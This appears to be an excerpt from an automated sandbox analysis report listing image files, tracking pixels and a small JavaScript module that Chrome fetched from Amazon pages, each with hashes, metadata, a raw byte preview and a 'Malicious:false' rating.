                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D8954%26at%3D8954%26t%3D1723729132224%26csmtags%3DstartVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26lob%3D0:8954
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4285%26at%3D4285%26t%3D1723729112265%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26ui%3D2%26lob%3D1:4285
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 167x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11086
                                                                                                                                                                                                        Entropy (8bit):7.957933249968999
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:qk/yQh/2AkwRhFDPLTAFEAmCT+NJa3Y3TY4ukU0hvEuMI6J5n7X1Y0IDbSz68sMN:qk/ygXPLUFJmCTq0S7ukU+suJ6z7X9Iu
                                                                                                                                                                                                        MD5:1180FD3CE0DA7052A0D1AC809D95CA2D
                                                                                                                                                                                                        SHA1:E9F4CF0B2D2AE0D9EBC88818A2B224D2E79C41C9
                                                                                                                                                                                                        SHA-256:B0C58DF29283B0AC43261515DDBC4FFCB722760F9D09E8D5203F394511969FB1
                                                                                                                                                                                                        SHA-512:DDCF38826EE2DFEBA7E42C461BA096A237A66DEF651ABB536AFBA2BB1F16EB97243C76C282A84DFA235E136385B6C28785D8000C71435DBA300055E56493B18B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.#2aqBr......34Rs.....Cb....S..Td....$%t..................................................!.1.Aq2Qa.....r..#$34...............?..x.*........rg~f..?....5?..>..."..".....o.....M...$..rN.X1..Q....'..............h.^ .>..[....@.\z.":..O.s....p.f.p.M..H.e|.l.......x..~...V.~........G..o.|.................S.>..~...ApN...K..>..?....]E.....,g...[.N..@7....4.....a..8..r..`....K"..D.*H....2.@;..A......|..F..`...t..Es.?.!...o......=^..C.o......._....K].x.=$.J1.~....{.I.B......t.>.......<...W*.}[..n:..+.[.w1....uGco..O/+...m.....Qq`.,...X+.....I..........u..O...k...=-S.R...2.t.G..........2..&.....p.. M..1.....S.%.Z7....'.....[.....a..=.....V"......~W.o..p.x..(.{.7.X...'.Q...GC_}H..O...>M...B)p...'.|~..j.#.Pr......W..|..?..E.>.I....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 250x148, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2285
                                                                                                                                                                                                        Entropy (8bit):7.583569868246524
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0ry2fWYw8YBLkISVbEmTE6H5HamgJhwsZJlhfPozJRKG:TN+WfGlTD0mgJhDzPwJRV
                                                                                                                                                                                                        MD5:1F896DB56D2AD7C475317B2B3D13BEEA
                                                                                                                                                                                                        SHA1:C3FD0EF552AECF262D20499E63DDE844B3DB59FE
                                                                                                                                                                                                        SHA-256:6FCD57FFF87BA7A1851C2E4400F81FB230A3F6964AB7AF5C2FC7B5DA74005D93
                                                                                                                                                                                                        SHA-512:DE6DE3440F828B0E5D11CE47F23E1F6A2F14D48BD82596D7508181442F46BEB71C818BBA6167039F8247CC821365D7D282FE6C3CBC1C14FA764509F2171E7726
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........w..................................................!1.Q.2Aaq."#BR.....r..3Cb......................................................?..................U....ZX.k...:.{..1.l.............K.v*...ZA9w.c...W.....?6J.mO.V..tt..rjc..'.Nm.v^..To\..W`up..&...>.~..B.j+...Q...r...NN/...z.5G..ch....}.E.....&.....`......................QW..~f....Z6...9}.....ic.-..tU.{..7y.?....\..c..h.../=.L..i.>r|B..J...H..9.wgD.T..$R."..D.[E......X.5....-....<.[q...X...x......I&....p...gxI......N.).......@.P.S...&d.....!<}(h..tu..kT...J....~.n.K.J...QW..W..z..7?.u..jx..z%..../..4.kQ..mW.U.........E..3c.H........9.s..R).9..@k..i...05.S-..(l.2.M..0".S2.T......$..0]+.KJ..\.O!).8\.|g........&s..YBv|....L...T.'9..W..).j....ZUcF.S...ZW......].x..-...X.....:.q..&z.........r..U..lE.qjiJ-4.V.0 a.h....,.A".i.+...FT...h
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 216x226, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5893
                                                                                                                                                                                                        Entropy (8bit):7.912470194550048
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TWRis090mraDlvtkhDyIEb1v4qhqXY6g8OEObLFdlf9wBGezZDVNZ15mHBe+vajK:e09nraDlvtk0IE94e16g8OYZXEBe+vau
                                                                                                                                                                                                        MD5:0BCD84906CC835154FF40B00A5EF29A7
                                                                                                                                                                                                        SHA1:403DD52A24944659D9AAA90B5D9452BF552486D4
                                                                                                                                                                                                        SHA-256:50980B7B069C1AA086DA18A4827A3B6041297E81EDE1FA1FAC449BB0D4931D56
                                                                                                                                                                                                        SHA-512:5AFE219B13E24E84AAAE3959ABE76DACE71F9329A2D449FE2923C2F817FB176DE7DFFEA0032AC4C2049FE8A346593F39A495C06D2366E43A5794C747596E50AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/51jPbUNkr8L._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1Q.ATq....."Ras......234BSUr...#5b....%.Ct....D..........................................!A............?..Z...'..F.dpkX.\.4.rI....N...tXTG..|..p....<..v....Vb.}C...q<. ....%....6.BY...c.kkc...a.5.f......._..X.Z.b.. ........s..w.}kC..X.o.....8..x....6!..r...l9u.P**)...`.d.] ..qx.#....,rV......X)f...p.....?..A...&i.;..C.[.G.0g..fq...H.vI...p\..q...w....PO..#Y..9w....lm.H`A&v%.~...+...l.....3eH .H%m.!..........V.V..C|..g.9.m.kQ....=.Z.v)0...#.5.....;.o.}...!..!..!..!..!.._X.8e.O..I;.q...`Tt..xY.'..N..e.A.........V.d'::(......;5...]T.$.......c........C.J.7...V...[...D........[.Z..H.....CC..PL...6#.~..W..u-.r........r\....)..WA#..i.X.g.,qm.#.#.i....?S.:..(.$L...`..l-o..{.q...7]..o.vf.1pu.m...Z.R.}l.J.4.S|.v..p.....F... ..n.A!-/.y.s.].5
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x214, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6770
                                                                                                                                                                                                        Entropy (8bit):7.890672655748658
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tw0BVed3l4oaoRRD4vAnrsf0uMRJl9oqCrtHWyFHZl3p/JsHq4GTlqYZi2kfCies:n323zaeRDKnMHlJ+BjFnjsK4IlhR0
                                                                                                                                                                                                        MD5:59C64790B2D0D60136EF1754BBF5B8F3
                                                                                                                                                                                                        SHA1:33A78FC6630988FA056309210FB31E1CF64A37CF
                                                                                                                                                                                                        SHA-256:551A18BC3BB11D9C6F5BDDF484408638469E73A82531DE25E96B1608066E5004
                                                                                                                                                                                                        SHA-512:BAD79B200280A3EB7461B077A2E14196CF1B7EC3339E1A94EC6834240A9BA57E3895AE9EB3DD72478C83722E02AA4A413CF274B2A1FC768F128464DDDBF7DAE5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..........................................................................:x...2m.o+....a.}>.0...t..Ah....#....<.c.c......[.lr..(.oi...............a......._$....)..@0T..D2...<.......c5s.|}`...^a.oU5R..t.-.i.U.....g...oqc.....E{..l.q...j.gk..........6.&....1.k0....f.64....*..i..O..M,...'9k.\E.F.7.w/rX.....k........gxe.d..2...c..";...$.[p"..(..6......DVG5..O.[.....d...>.2...p:..Euo+{,4: Q.]]J..*...E.W.sv.>kjY.*...kx.1^.._yt.^R.kji.....J....:......y.s...w..8..,02..<6.;..--.q.Y..A._.@.[].n\..wW..~...S.:Ge....]....3.+(.J.......n#..).Q....a..s.ZE........h.m.~..E....p...2..t.OPab...n.>..p.Y^.6...6>..N...g.z....\...w.N.[q.......[..n....=.kzw.5u...=_o._e.98.*.........[...j........~}z.6....N..^8...[t.+..?.#..c6.}a.:>P/......4n..z..?.....B.....(.R. Rl...->..I.e.~...........\..ZM...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2505
                                                                                                                                                                                                        Entropy (8bit):7.57821258014142
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:Q49FzEk6I87i/7btk9QTMYQuBBeCx+jkgfotZzVKOQ5J04/3JQA2v:/9hEkUi/ZMGJ3QJZwn
                                                                                                                                                                                                        MD5:002622B77205566964885B74BF6DFED2
                                                                                                                                                                                                        SHA1:5ADD68A03B70A9AB3C6942F7211CC81F413FDC9B
                                                                                                                                                                                                        SHA-256:42EAAEC6B2FC15562C3616C2C1510B7C9F37E2FB6908C21956DCE1CA6076EAAC
                                                                                                                                                                                                        SHA-512:5BF09C3AFB54BBD6ABB0C1B78796E79A5D6477BCD0D8756820990842F315A1CF30F1BCE0CDBA03A6326841ACD294EBCF7E5B4AE8F35FCF4AA9C69AD2313057BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........8........................................................................7...........8s.t..F.....T..-.T......Dyo}.NFw......*...*.}n..)..=.).*....:..../F.O.........._...<Ye}....2...p.C...j.E....F...........UG..J..l.. ....q.r.-.u....<.Q........ .j...A.|-L.y${.....-...Q..Z.n8p......3?.o./D...h.t..X......._...............P.............................!.$1@EUa..%45ATdu......&DFPQeqv.........6GV..............?..c6.........oKY(...o...x...JD....3.-_hz.Ih...1....4j....>?L;.....l.U..S&.L..FC.}m..x~Y.-h.K_F)%M\.Z..\.......T^}}...7.}.j..=...B........$.....&......|.........nF6R.,5b..Q.M.8.uQ...ui......^........1.c\.."..M.nA..(L ..Z...7..j...m.&...........*...E.$.Gv.......Y..p@Bc...,...6("'.6...F.f.&..bH.+..Q....K..}#1..P...d%...m..O_/.s3..=C0..9..K.J~U.q]...~...........&..G...S.`....O...u}._.....)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4146
                                                                                                                                                                                                        Entropy (8bit):7.895902820808029
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TniiJdkmzyk6YGc9JoeWgLHJskQnDDjOLjTqJH5mmcgBswhTfjjBhi23d:z5eFrS7WgLHJsNnDDjOXG1kmccswRfjL
                                                                                                                                                                                                        MD5:68C691805E195A60C7390E4D979BAC06
                                                                                                                                                                                                        SHA1:B9E83B3DB404D6D69FE51A541936045E006DC5EE
                                                                                                                                                                                                        SHA-256:9D817B83BB7C3E3EB3627280AB1136F649DAD4220589C5E69BE9015B335E0170
                                                                                                                                                                                                        SHA-512:C5A811E150AD76D89160AF284C6C4131046699CCC4D3274901CF755FBF1A25E5D218F9B437D0B80AA535309BE7F063F4547D9B69E23E5F62D686036B668773A6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!..1."AQ.qr.24as....#$St.......%BRTb...&3u....5C....................................................!12A....".Qa............?.&1...s..z..fm./.s..9....xW.....N...zF,U.&.1t..X.....aQ.:&..@...uo.H4D..i....f`..I........@.K./....5....K#DI.. :..|.9..@....[.8.Ho. ..)/.)......b3..Z...w...17=...d....}.....j..:.s..<d..[..8.T.)..`..0..lwi.,.p....m/Rya.TgNu/...7.]C.3...4.2.Z..%.x.+U.b..".At..../,D......T4.N...n.#..7V.......6.rM<.....=..5k}..}V[a..-.eJ. .......x5....2|.S....;.D.8.+M.eTs..c|..J....F6....63.3.O..F.?eod......!t....*F.lG..TO..6..{......j.x... .r.w..DQ.....5i.v..;....j...5.|..M..)..kB.R).0i.<.m.\..k...S..... ...@ONb(}.}.g...E......T...h.......F...z..V.O|.fEbT.Io,....7H....Rx........y.1.....\c.h..?....n...CR.Rvu7.$.)8......q..mX..H..Jd7
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50354
                                                                                                                                                                                                        Entropy (8bit):7.969356113927722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                        MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                        SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                        SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                        SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):47377
                                                                                                                                                                                                        Entropy (8bit):7.9841058072419955
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:SV8z0ve/cOpWwehdP7/lFu73QBmG0oEFsdzUyQC7Uy7D2jsxWr/qJOTQ6AF/:0Y0ucq2bTTopfmUYamWrUOTlAx
                                                                                                                                                                                                        MD5:4BA3A51DBE51C5C94BAA6D67FA408C90
                                                                                                                                                                                                        SHA1:9E12CFE54286C018AB897A32D8BCBB302C599059
                                                                                                                                                                                                        SHA-256:0F618F1ED81DB7B9EE52D48E8D66A5080159B6766222EEF6A85F996C198B8242
                                                                                                                                                                                                        SHA-512:943305B8141B358E2B233223D690086FD8E3998FA5D5C5A0672E11E8D929AA70DBF7006C0C79DFAF321DC30822A8AA9B412632D6B6BB325B7A2723A2B0FF1165
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U..............R.....T.....S.....N.....Q........V..P............".=..M.................L........Y'3Bjos%1@\al.....QUYbW[e#/>... ..^cn..$..hrw{. 0#!!*5CRV^NR^X]i..(..L.n....)8mrvptx.k.$4.....a.+:...afr.p!"&sw.eit)$!z.....ns~PUapu.lq{w{....'&'[`e..T....u.jvz..n.'6gmx.........4691+&....fjoy;BOAHT---.d.....,.JO\)),.}........h......"..FMX4;H112....0..;<=W[^eim...DA>.6...............u.z...RZf..f.........'.....hKKLO...V...}N.._....J.......t.T9B93.....E....PORV.]@.....a<%..q.n...~]..........._M<..Udeg.y[DEH.[H%...P..U..........s^..=.pO.nv^....g..oH0..X..Y..b...._.....k..b..u.....k....jWC..............e..nj3...}.....}~i..O.....d.fN..s.......y.....a....W..,......|D#..w..'......fjT..f....w..9..\..=..6.......~D....$............ .IDATx..O........+.T.yf..d.,.. ....t.a.=.7...S/=.zs...P.zP.@.))..!......t..)qK..R..B.t.......~..o4.H1....Hbm}.}....ml..67...k.......UN..a......./.;.R..o}.....7.f........J.[e.e..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3947
                                                                                                                                                                                                        Entropy (8bit):7.880130399098271
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rm6J1qbdMxFyBycnuKW98T/owjqjcelV3f2B8d0v/3qYj4ye8svFmuaNtPucP:TMEU+yWZLTqte8+v/3qYDejNqhGWwLHk
                                                                                                                                                                                                        MD5:1981E40984A2A7258D39AF758FE80E3C
                                                                                                                                                                                                        SHA1:708E5C1329252F61A2655DB9D9161CFAEAB4F601
                                                                                                                                                                                                        SHA-256:AE5A1DB70BAD4052B25E3B8B094B990B556DD820312FB08417D68BD2C5433A55
                                                                                                                                                                                                        SHA-512:42A4EDE64F240716671E72162F3FE086F9BA7E6AA5ADB9B8273E6A20EE177E9000C49FBEAAC636590F07FEE2F021A5135702819E831F0F6CDF638B0C67CC6C94
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A..."Qaq.....#2r.....BSs.....$%3CRbct.4................................................!1A2..............?..=[.I....1..-..t.m..Qj...*.A#,H.3f..L....s.]pr.P.m....4{....!....%..1.nm[.Nv.O.."L.j..%.P..z,..x!n......7......'.6...x.CkC.......S.t.....im.J.....2.@.#u.8.y.t....f...(.L.[0[i&N.....v..Z.(./Cv.IK..GN...g.z.l:..)Z....]eu.c..h...L[.J..`..':..[.......^d.!..7/.....s.*0U..n..aOJ.g.9.c..]...p...._>FY.-5@....-Og.&..t.SQm.I.k.H.)...2.>.......Y'.c../.....&...;R....+.m=$...{.yTE:\...S...mw..;Q..9....%.......N.?]Hm..?\.....GG.}i.d..d...y..+.../!.p.5zT.ZU.V}.~N.?F.uu.......,um.#0..=.+.%.......F.9.y..g..V...f.....O.....Yv.;u...6....B............5...3..Y..P........W.HQ....B..4....%A..yx.D...%./...=mt......-.........W.."1.$..Q.Ki..w*.W
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D74%26pc0%3D485%26ld0%3D485%26t0%3D1723729108465%26sc1%3Dportal-bb%26pc1%3D2%26ld1%3D2%26t1%3D1723729108095%26sc2%3DcsmCELLSframework%26bb2%3D891%26pc2%3D891%26ld2%3D891%26t2%3D1723729108871%26sc3%3DcsmCELLSpdm%26bb3%3D891%26pc3%3D893%26ld3%3D893%26t3%3D1723729108873%26sc4%3DcsmCELLSvpm%26bb4%3D893%26pc4%3D893%26ld4%3D893%26t4%3D1723729108873%26sc5%3DcsmCELLSfem%26bb5%3D894%26pc5%3D894%26ld5%3D894%26t5%3D1723729108874%26sc6%3Due_sushi_v1%26bb6%3D895%26pc6%3D896%26ld6%3D896%26t6%3D1723729108876%26ctb%3D1:1296
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):676
                                                                                                                                                                                                        Entropy (8bit):5.171714767992367
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2BZ/eqKDQM3ShtD34Z9DkkM8uN6FQQJewqDEZ6R8UNIkMVFLJl:2BZ/e3DZ3ShtDoZyaiIQQJixNITVFLJl
                                                                                                                                                                                                        MD5:6E933965CAFAEC4DEFB36AB5E2AAD9A8
                                                                                                                                                                                                        SHA1:8C240969FD002A6679BA28D10DB97280B8D16158
                                                                                                                                                                                                        SHA-256:CA0541D6E2197B0686598AF9F0A2F55643E1451B1375AA2B9650169BC2E76521
                                                                                                                                                                                                        SHA-512:B49F06AE8D0F77CB63167A62C5D9C5AF78D3C4B821F73CDF2A68C28E2F90A8CC68143AE483CD8598C525B7E4F05A33B3EA5D5077F72913ADAE69ADC30CA881A7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(e){var d=window.AmazonUIPageJS||window.P,f=d._namespace||d.attributeErrors,a=f?f("GenericObservableJS",""):d;a.guardFatal?a.guardFatal(e)(a,window):a.execute(function(){e(a,window)})})(function(e,d,f){e.register("generic-observable",function(){return function(){var a=this,g={};a.addObserver=function(b,a){g[b]=g[b]||[];g[b].push(a)};a.removeObserver=function(b,a){b=g[b]||[];for(var c=0;c<b.length;)b[c]===a?b.splice(c,1):c++};a.notifyObservers=function(){for(var b=arguments[0],d=[],c=0;c<.arguments.length;c++)d.push(arguments[c]);b=(g[b]||[]).slice(0);for(c=0;c<b.length;c++){var f=b[c];try{f.apply(a,d)}catch(h){e.execute(function(){throw h;})}}};return a}})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D71%26pc0%3D13061%26ld0%3D13061%26t0%3D1723729107575%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:13061
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8295
                                                                                                                                                                                                        Entropy (8bit):7.953964460075553
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:XBAu536hMKz6WluU62g0iEzyoijH2Cb8EXSQj10nJis:+u536hMKeWV6X3EzyocNXSQK0s
                                                                                                                                                                                                        MD5:8C38CC05AFC0EF2A0ED1588C33901E5D
                                                                                                                                                                                                        SHA1:9241B019F1F348FDC3C04788F08BEAA855A6FB12
